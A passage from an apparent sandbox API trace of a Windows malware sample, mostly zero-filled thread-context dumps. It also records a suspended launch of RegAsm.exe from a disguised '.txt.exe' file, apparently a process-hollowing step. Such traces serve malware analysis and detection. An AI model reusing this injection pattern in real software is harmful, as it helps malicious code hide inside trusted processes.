[55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0107.496] TerminateProcess (hProcess=0x11c, uExitCode=0x0) returned 1 [0107.501] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x3875004 | out: Context=0x3875004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0107.501] Sleep (dwMilliseconds=0xa) [0107.514] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x3875004 | out: Context=0x3875004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0107.515] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegAsm.exe", lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AJTD.txt.exe\" ", lpProcessAttributes=0x3870000, lpThreadAttributes=0x3870000, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x3870400*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3870800, hNewToken=0x0 | out: lpProcessInformation=0x3870800*(hProcess=0x124, hThread=0x120, dwProcessId=0x7d8, dwThreadId=0x9f0), hNewToken=0x0) returned 1 [0107.524] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x3875004 | out: Context=0x3875004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, 